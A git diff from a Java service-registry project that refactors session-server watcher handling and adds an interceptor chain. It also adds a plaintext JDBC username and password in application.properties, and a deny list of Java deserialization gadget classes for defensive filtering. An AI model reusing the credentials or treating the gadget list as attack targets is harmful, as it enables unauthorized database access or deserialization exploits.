com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.common.model.store.Watcher; import com.alipay.sofa.registry.core.constants.EventTypeConstants; @@ -24,58 +26,93 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.bolt.BoltChannelUtil; +import com.alipay.sofa.registry.remoting.bolt.BoltUtil; import com.alipay.sofa.registry.server.session.converter.SubscriberConverter; import com.alipay.sofa.registry.server.session.registry.Registry; import com.alipay.sofa.registry.server.session.strategy.WatcherHandlerStrategy; import org.apache.commons.lang.StringUtils; import org.springframework.beans.factory.annotation.Autowired; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; - /** * @author xuanbei * @since 2019/2/15 */ public class DefaultWatcherHandlerStrategy implements WatcherHandlerStrategy { - private static final Logger LOGGER = LoggerFactory - .getLogger(DefaultWatcherHandlerStrategy.class); + private static final Logger WATCH_LOGGER = LoggerFactory.getLogger("WATCH-RECEIVE"); - @Autowired - private Registry sessionRegistry; + @Autowired private Registry sessionRegistry; - @Override - public void handleConfiguratorRegister(Channel channel, - ConfiguratorRegister configuratorRegister, - RegisterResponse registerResponse) { - try { - configuratorRegister.setIp(channel.getRemoteAddress().getAddress().getHostAddress()); - configuratorRegister.setPort(channel.getRemoteAddress().getPort()); + @Override + public void handleConfiguratorRegister( + Channel channel, + ConfiguratorRegister configuratorRegister, + RegisterResponse registerResponse) { + Watcher watcher = null; + try { + configuratorRegister.setIp(channel.getRemoteAddress().getAddress().getHostAddress()); + configuratorRegister.setPort(channel.getRemoteAddress().getPort()); - if (StringUtils.isBlank(configuratorRegister.getInstanceId())) { - configuratorRegister.setInstanceId(DEFAULT_INSTANCE_ID); - } + if (StringUtils.isBlank(configuratorRegister.getInstanceId())) { + configuratorRegister.setInstanceId(DEFAULT_INSTANCE_ID); + } - Watcher watcher = SubscriberConverter.convert(configuratorRegister); - watcher.setProcessId(channel.getRemoteAddress().getHostName() + ":" - + channel.getRemoteAddress().getPort()); - watcher.setSourceAddress(new URL(channel.getRemoteAddress(), BoltChannelUtil - .getBoltCustomSerializer(channel))); + watcher = SubscriberConverter.convert(configuratorRegister); + watcher.setProcessId( + channel.getRemoteAddress().getHostName() + ":" + channel.getRemoteAddress().getPort()); - if (EventTypeConstants.REGISTER.equals(configuratorRegister.getEventType())) { - sessionRegistry.register(watcher); - } else if (EventTypeConstants.UNREGISTER.equals(configuratorRegister.getEventType())) { - sessionRegistry.unRegister(watcher); - } - registerResponse.setVersion(configuratorRegister.getVersion()); - registerResponse.setRegistId(configuratorRegister.getRegistId()); - LOGGER.info("ConfiguratorRegister register success! {}", watcher); - registerResponse.setSuccess(true); - registerResponse.setMessage("ConfiguratorRegister register success!"); - } catch (Exception e) { - LOGGER.error("ConfiguratorRegister register error!", e); - registerResponse.setSuccess(false); - registerResponse.setMessage("ConfiguratorRegister register failed!"); - } + handle(watcher, channel, configuratorRegister, registerResponse); + } catch (Throwable e) { + handleError(configuratorRegister, watcher, registerResponse, e); } + } + + protected void handle( + Watcher watcher, + Channel channel, + ConfiguratorRegister register, + RegisterResponse registerResponse) { + watcher.setSourceAddress( + new URL(channel.getRemoteAddress(), BoltUtil.getBoltCustomSerializer(channel))); + watcher.setTargetAddress(new URL(channel.getLocalAddress())); + + final String eventType = register.getEventType(); + if (EventTypeConstants.REGISTER.equals(eventType)) { + sessionRegistry.register(watcher); + } else if (EventTypeConstants.UNREGISTER.equals(eventType)) { + sessionRegistry.unRegister(watcher); + } else { + RegisterLogs.REGISTER_LOGGER.warn("unsupported watch.eventType:{}", eventType); + } + registerResponse.setVersion(register.getVersion()); + registerResponse.setRegistId(register.getRegistId()); + registerResponse.setSuccess(true); + registerResponse.setMessage("ConfiguratorRegister register success!"); + log(true, register, watcher); + } + + private void log(boolean success, ConfiguratorRegister register, Watcher watcher) { + // [Y|N],[R|U|N],app,zone,dataInfoId,registerId,clientVersion,clientIp,clientPort + WATCH_LOGGER.info( + "{},{},{},{},{},{},{},{},{},{},{}", + success ? 'Y' : 'N', + EventTypeConstants.getEventTypeFlag(register.getEventType()), + register.getAppName(), + register.getZone(), + register.getDataId(), + register.getGroup(), + register.getInstanceId(), + register.getRegistId(), + watcher == null ? "" : watcher.getClientVersion(), + register.getIp(), + register.getPort()); + } + + protected void handleError( + ConfiguratorRegister register, + Watcher watcher, + RegisterResponse registerResponse, + Throwable e) { + log(false, register, watcher); + RegisterLogs.logError(register, "Watcher", registerResponse, e); + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/RegisterLogs.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/RegisterLogs.java new file mode 100644 index 000000000..6cf63c6a8 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/RegisterLogs.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.strategy.impl; + +import com.alipay.sofa.registry.core.model.BaseRegister; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.exchange.RequestChannelClosedException; + +public final class RegisterLogs { + public static final Logger REGISTER_LOGGER = LoggerFactory.getLogger("REGISTER"); + + private RegisterLogs() {} + + public static void logError( + BaseRegister register, String name, RegisterResponse registerResponse, Throwable e) { + if (e instanceof RequestChannelClosedException) { + REGISTER_LOGGER.warn( + "{} register error, Type {}, {}", name, register.getEventType(), e.getMessage()); + } else { + REGISTER_LOGGER.error("{} register error, Type {}", name, register.getEventType(), e); + } + registerResponse.setSuccess(false); + registerResponse.setMessage(name + " register failed!Type:" + register.getEventType()); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/utils/DatumUtils.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/utils/DatumUtils.java deleted file mode 100644 index e73398a75..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/utils/DatumUtils.java +++ /dev/null @@ -1,49 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.utils; - -import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.store.Subscriber; - -import java.util.HashMap; - -/** - * @author xuanbei - * @since 2019/2/12 - */ -public class DatumUtils { - /** - * create new datum when parameter is null. - * - * @param datum - * @param subscriber - * @return - */ - public static Datum newDatumIfNull(Datum datum, Subscriber subscriber) { - if (datum == null) { - datum = new Datum(); - datum.setDataId(subscriber.getDataId()); - datum.setInstanceId(subscriber.getInstanceId()); - datum.setGroup(subscriber.getGroup()); - datum.setVersion(ValueConstants.DEFAULT_NO_DATUM_VERSION); - datum.setPubMap(new HashMap<>()); - datum.setDataCenter(ValueConstants.DEFAULT_DATA_CENTER); - } - return datum; - } -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/AccessLimitWrapperInterceptor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/AccessLimitWrapperInterceptor.java new file mode 100644 index 000000000..630d42a12 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/AccessLimitWrapperInterceptor.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.wrapper; + +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.StoreData; +import com.alipay.sofa.registry.server.session.limit.AccessLimitService; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version 1.0: AccessLimitWrapperInterceptor.java, v 0.1 2019-08-26 20:29 shangyu.wh Exp $ + */ +public class AccessLimitWrapperInterceptor implements WrapperInterceptor { + + @Autowired private AccessLimitService accessLimitService; + + @Override + public Boolean invokeCodeWrapper(WrapperInvocation invocation) + throws Exception { + + BaseInfo baseInfo = (BaseInfo) invocation.getParameterSupplier().get(); + + if (!accessLimitService.tryAcquire()) { + throw new RuntimeException( + String.format( + "Register access limit for session server!dataInfoId=%s,connectId=%s", + baseInfo.getDataInfoId(), baseInfo.getSourceAddress())); + } + + return invocation.proceed(); + } + + @Override + public int getOrder() { + return 0; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/BlacklistWrapperInterceptor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/BlacklistWrapperInterceptor.java new file mode 100644 index 000000000..1be797230 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/BlacklistWrapperInterceptor.java @@ -0,0 +1,68 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.wrapper; + +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.StoreData; +import com.alipay.sofa.registry.common.model.store.StoreData.DataType; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.server.session.filter.ProcessFilter; +import com.alipay.sofa.registry.server.session.push.FirePushService; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * blacklist filter + * + * @author shangyu.wh + * @version 1.0: BlacklistWrapperInterceptor.java, v 0.1 2019-06-18 22:26 shangyu.wh Exp $ + */ +public class BlacklistWrapperInterceptor implements WrapperInterceptor { + + @Autowired private FirePushService firePushService; + /** blacklist filter */ + @Autowired private ProcessFilter processFilter; + + @Override + public Boolean invokeCodeWrapper(WrapperInvocation invocation) + throws Exception { + + BaseInfo storeData = (BaseInfo) invocation.getParameterSupplier().get(); + + if (processFilter.match(storeData)) { + if (DataType.PUBLISHER == storeData.getDataType()) { + // match blacklist stop pub. + return true; + } + + if (DataType.SUBSCRIBER == storeData.getDataType()) { + fireSubscriberPushEmptyTask((Subscriber) storeData); + return true; + } + } + return invocation.proceed(); + } + + @Override + public int getOrder() { + return 200; + } + + private void fireSubscriberPushEmptyTask(Subscriber subscriber) { + // trigger empty data push + firePushService.fireOnPushEmpty(subscriber); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/ClientCheckWrapperInterceptor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/ClientCheckWrapperInterceptor.java new file mode 100644 index 000000000..ae27e482e --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/ClientCheckWrapperInterceptor.java @@ -0,0 +1,61 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.wrapper; + +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.StoreData; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.remoting.exchange.RequestChannelClosedException; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * check connect already existed + * + * @author shangyu.wh + * @version 1.0: ClientCheckWrapperInterceptor.java, v 0.1 2019-06-18 13:53 shangyu.wh Exp $ + */ +public class ClientCheckWrapperInterceptor implements WrapperInterceptor { + + @Autowired private SessionServerConfig sessionServerConfig; + + @Autowired private Exchange boltExchange; + + @Override + public Boolean invokeCodeWrapper(WrapperInvocation invocation) + throws Exception { + + BaseInfo baseInfo = (BaseInfo) invocation.getParameterSupplier().get(); + + Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); + + Channel channel = sessionServer.getChannel(baseInfo.getSourceAddress()); + + if (channel == null) { + throw new RequestChannelClosedException( + String.format("Register address %s channel closed", baseInfo.getSourceAddress())); + } + return invocation.proceed(); + } + + @Override + public int getOrder() { + return 100; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/Wrapper.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/Wrapper.java new file mode 100644 index 000000000..61240701e --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/Wrapper.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.wrapper; + +import java.util.function.Supplier; + +/** + * @author shangyu.wh + * @version 1.0: Wrapper.java, v 0.1 2019-06-18 19:33 shangyu.wh Exp $ + */ +public interface Wrapper { + + R call(); + + Supplier getParameterSupplier(); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/WrapperInterceptor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/WrapperInterceptor.java new file mode 100644 index 000000000..6b8a18168 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/WrapperInterceptor.java @@ -0,0 +1,40 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.wrapper; + +/** + * @author shangyu.wh + * @version 1.0: WrapperInterceptor.java, v 0.1 2019-06-18 11:45 shangyu.wh Exp $ + */ +public interface WrapperInterceptor { + + /** + * invoke inside function + * + * @param invocation + * @return + * @throws Exception + */ + R invokeCodeWrapper(WrapperInvocation invocation) throws Exception; + + /** + * Interceptor order + * + * @return + */ + int getOrder(); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/WrapperInterceptorManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/WrapperInterceptorManager.java new file mode 100644 index 000000000..e4860b4ca --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/WrapperInterceptorManager.java @@ -0,0 +1,73 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.wrapper; + +import java.util.Collections; +import java.util.List; +import java.util.concurrent.CopyOnWriteArrayList; + +/** + * @author shangyu.wh + * @version 1.0: WrapperInterceptorManager.java, v 0.1 2019-06-18 14:51 shangyu.wh Exp $ + */ +public class WrapperInterceptorManager { + + private List interceptorChain = new CopyOnWriteArrayList<>(); + + public int addInterceptor(WrapperInterceptor item) { + // The index of the search key, if it is contained in the list; otherwise, (-(insertion point) - + // 1) + final int index = + Collections.binarySearch( + interceptorChain, + item, + (o1, o2) -> { + if (o1 == null && o2 == null) { + return 0; + } else if (o1 == null) { + return 1; + } else if (o2 == null) { + return -1; + } + + if (o1.getOrder() < o2.getOrder()) { + return -1; + } else if (o1.getOrder() > o2.getOrder()) { + return 1; + } + return 0; + }); + final int insertAt; + if (index < 0) { + insertAt = -(index + 1); + } else { + insertAt = index + 1; + } + + interceptorChain.add(insertAt, item); + return insertAt; + } + + /** + * Getter method for property interceptorChain. + * + * @return property value of interceptorChain + */ + public List getInterceptorChain() { + return interceptorChain; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/WrapperInvocation.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/WrapperInvocation.java new file mode 100644 index 000000000..9ab3272bc --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/wrapper/WrapperInvocation.java @@ -0,0 +1,56 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.wrapper; + +import java.util.Iterator; +import java.util.List; +import java.util.function.Supplier; + +/** + * @author shangyu.wh + * @version 1.0: WrapperInvocation.java, v 0.1 2019-06-18 11:43 shangyu.wh Exp $ + */ +public class WrapperInvocation { + + private final Wrapper target; + + private Iterator iterator; + + public WrapperInvocation( + Wrapper target, WrapperInterceptorManager wrapperInterceptorManager) { + List interceptorChain = wrapperInterceptorManager.getInterceptorChain(); + this.iterator = interceptorChain.iterator(); + this.target = target; + } + + public R proceed() throws Exception { + if (iterator.hasNext()) { + WrapperInterceptor interceptor = iterator.next(); + return interceptor.invokeCodeWrapper(this); + } + return target.call(); + } + + /** + * Getter method for property ParameterSupplier. + * + * @return property value of ParameterSupplier + */ + public Supplier getParameterSupplier() { + return target.getParameterSupplier(); + } +} diff --git a/server/server/session/src/main/resources/application.properties b/server/server/session/src/main/resources/application.properties index 9df254384..c98d6a4d9 100644 --- a/server/server/session/src/main/resources/application.properties +++ b/server/server/session/src/main/resources/application.properties @@ -1,7 +1,7 @@ spring.main.banner-mode=LOG -#nodes.metaNode=: -#nodes.localDataCenter= -#nodes.localRegion= +nodes.metaNode=DefaultDataCenter:localhost +nodes.localDataCenter=DefaultDataCenter +nodes.localRegion=DEFAULT_ZONE #session.server.logging.level=INFO #session.server.logging.home=/home/admin/logs/registry/session @@ -10,6 +10,7 @@ session.server.serverSyncPort=9601 session.server.httpServerPort=9603 session.server.metaServerPort=9610 session.server.dataServerPort=9620 +session.server.syncSessionPort=9602 session.server.serverDescription=dev session server session.server.sessionServerRegion=DEFAULT_ZONE session.server.sessionServerDataCenter=DefaultDataCenter @@ -19,12 +20,29 @@ session.server.printTask.fixedDelay=30000 session.server.schedulerCheckVersionTimeout=3 session.server.schedulerCheckVersionFirstDelay=3 session.server.schedulerCheckVersionExpBackOffBound=10 -session.server.schedulerHeartbeatTimeout=30 -session.server.schedulerHeartbeatFirstDelay=30 -session.server.schedulerHeartbeatExpBackOffBound=10 +session.server.schedulerHeartbeatTimeout=3 +session.server.schedulerHeartbeatFirstDelay=3 +session.server.schedulerHeartbeatExpBackOffBound=1 session.server.schedulerFetchDataTimeout=3 session.server.schedulerFetchDataFirstDelay=3 session.server.schedulerFetchDataExpBackOffBound=10 #session.server.invalidForeverZones=; #session.server.invalidIgnoreDataidRegex= -#session.server.pushEmptyDataDataIdPrefixes= \ No newline at end of file +#session.server.pushEmptyDataDataIdPrefixes= +session.server.renewDatumWheelTaskDelaySec=180 +session.server.renewDatumWheelTaskRandomFirstDelaySec=60 +session.server.silenceHore=24 + + +## connect db +persistence.profile.active=jdbc +jdbc.driverClassName = com.mysql.jdbc.Driver +jdbc.url = jdbc:mysql://127.0.0.1:2883/metadatadb?useUnicode=true&characterEncoding=utf8 +jdbc.username = obvip_infra_dev_1:infra_public_dev0_2769:metadatadb +jdbc.password = 7Yh4Csc4 + + +#jdbc.typeAliasesPackage=com.alipay.sofa.registry.jdbc.domain +jdbc.mapperLocations=classpath:mapper/*.xml + + diff --git a/server/server/session/src/main/resources/log4j2.xml b/server/server/session/src/main/resources/log4j2.xml new file mode 100644 index 000000000..2b0e22efd --- /dev/null +++ b/server/server/session/src/main/resources/log4j2.xml @@ -0,0 +1,294 @@ + + + + + ${user.home}/logs/registry/session + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/server/session/src/main/resources/logback-spring.xml b/server/server/session/src/main/resources/logback-spring.xml deleted file mode 100644 index 7df0a5104..000000000 --- a/server/server/session/src/main/resources/logback-spring.xml +++ /dev/null @@ -1,301 +0,0 @@ - - - - - - - - - - - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - - - - - true - - ERROR - - ${SESSION_LOG_HOME}/common-error.log - - ${SESSION_LOG_HOME}/common-error.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/common-default.log - - ${SESSION_LOG_HOME}/common-default.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-raft.log - - ${SESSION_LOG_HOME}/registry-raft.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-session.log - - ${SESSION_LOG_HOME}/registry-session.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-startup.log - - ${SESSION_LOG_HOME}/registry-startup.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-connect.log - - ${SESSION_LOG_HOME}/registry-connect.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-console.log - - ${SESSION_LOG_HOME}/registry-console.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-exchange.log - - ${SESSION_LOG_HOME}/registry-exchange.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-push.log - - ${SESSION_LOG_HOME}/registry-push.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ERROR - - ${SESSION_LOG_HOME}/common-push-error.log - - ${SESSION_LOG_HOME}/common-push-error.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${SESSION_LOG_HOME}/registry-profile-digest.log - - ${SESSION_LOG_HOME}/registry-profile-digest.log.%d{yyyy-MM-dd} - 10 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - 0 - 65536 - - - - - 0 - 65536 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/server/server/session/src/main/resources/security/blacklist.txt b/server/server/session/src/main/resources/security/blacklist.txt new file mode 100644 index 000000000..e3413f8d4 --- /dev/null +++ b/server/server/session/src/main/resources/security/blacklist.txt @@ -0,0 +1,78 @@ +org.codehaus.groovy.runtime.MethodClosure +clojure.core$constantly +clojure.main$eval_opt +com.alibaba.citrus.springext.support.parser.AbstractNamedProxyBeanDefinitionParser$ProxyTargetFactory +com.alibaba.citrus.springext.support.parser.AbstractNamedProxyBeanDefinitionParser$ProxyTargetFactoryImpl +com.alibaba.citrus.springext.util.SpringExtUtil.AbstractProxy +com.alipay.custrelation.service.model.redress.Pair +com.caucho.hessian.test.TestCons +com.mchange.v2.c3p0.JndiRefForwardingDataSource +com.mchange.v2.c3p0.WrapperConnectionPoolDataSource +com.rometools.rome.feed.impl.EqualsBean +com.rometools.rome.feed.impl.ToStringBean +com.sun.jndi.rmi.registry.BindingEnumeration +com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl +com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl +com.sun.rowset.JdbcRowSetImpl +com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data +java.rmi.server.UnicastRemoteObject +java.security.SignedObject +java.util.ServiceLoader$LazyIterator +javax.imageio.ImageIO$ContainsFilter +javax.imageio.spi.ServiceRegistry +javax.management.BadAttributeValueExpException +javax.naming.InitialContext +javax.naming.spi.ObjectFactory +javax.script.ScriptEngineManager +javax.sound.sampled.AudioFormat$Encoding +org.apache.carbondata.core.scan.expression.ExpressionResult +org.apache.commons.dbcp +org.apache.commons.dbcp2 +org.apache.commons.beanutils +org.apache.ibatis.executor.loader.AbstractSerialStateHolder +org.apache.ibatis.executor.loader.CglibSerialStateHolder +org.apache.ibatis.executor.loader.JavassistSerialStateHolder +org.apache.ibatis.executor.loader.cglib.CglibProxyFactory +org.apache.ibatis.executor.loader.javassist.JavassistSerialStateHolder +org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource +org.apache.wicket.util.upload.DiskFileItem +org.apache.xalan.xsltc.trax.TemplatesImpl +org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding +org.apache.xpath.XPathContext +org.eclipse.jetty.util.log.LoggerLog +org.geotools.filter.ConstantExpression 